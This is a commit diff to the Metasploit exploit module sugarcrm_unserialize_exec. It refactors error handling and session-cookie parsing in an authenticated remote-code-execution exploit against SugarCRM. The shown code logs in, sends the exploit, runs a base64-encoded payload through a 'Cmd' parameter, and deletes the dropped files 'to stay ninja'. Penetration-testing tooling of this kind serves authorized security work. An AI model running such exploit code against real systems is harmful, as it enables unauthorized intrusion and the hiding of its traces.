Land rapid7#4656, @nanomebia's fixes for sugarcrm_unserialize_exec

Author: jvazquez-r7

modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb

@@ -67,7 +67,7 @@ def on_new_session(client)
         client.fs.file.rm(f)
         print_good("#{peer} - #{f} removed to stay ninja")
       rescue
-        print_error("#{peer} - Unable to remove #{f}")
+        print_warning("#{peer} - Unable to remove #{f}")
       end
     end
   end
@@ -95,16 +95,16 @@ def exploit
       'data'   => data
     })
 
-    if res.nil? or res.headers['Location'] =~ /action=Login/ or res.get_cookies.empty?
-      print_error("#{peer} - Login failed with \"#{username}:#{password}\"")
-      return
+    if res.nil? || res.headers['Location'].include?('action=Login') || res.get_cookies.empty?
+      fail_with(Failure::NoAccess, "#{peer} - Login failed with \"#{username}:#{password}\"")
     end
 
     if res.get_cookies =~ /PHPSESSID=([A-Za-z0-9]*); path/
       session_id = $1
+    elsif res.get_cookies =~ /PHPSESSID=([A-Za-z0-9]*);/
+      session_id = $1
     else
-      print_error("#{peer} - Login failed with \"#{username}:#{password}\" (No session ID)")
-      return
+      fail_with(Failure::NoAccess, "#{peer} - Login failed with \"#{username}:#{password}\" (No session ID)")
     end
 
     print_status("#{peer} - Login successful with #{username}:#{password}")
@@ -128,9 +128,8 @@ def exploit
       'data' => data
     })
 
-    if not res or res.code != 200
-      print_error("#{peer} - Exploit failed: #{res.code}")
-      return
+    unless res && res.code == 200
+      fail_with(Failure::Unknown, "#{peer} - Exploit failed: #{res.code}")
     end
 
     print_status("#{peer} - Executing the payload")
@@ -143,11 +142,6 @@ def exploit
         'Cmd' => Rex::Text.encode_base64(payload.encoded)
       }
     })
-
-    if res
-      print_error("#{peer} - Payload execution failed: #{res.code}")
-      return
-    end
-
   end
 end
+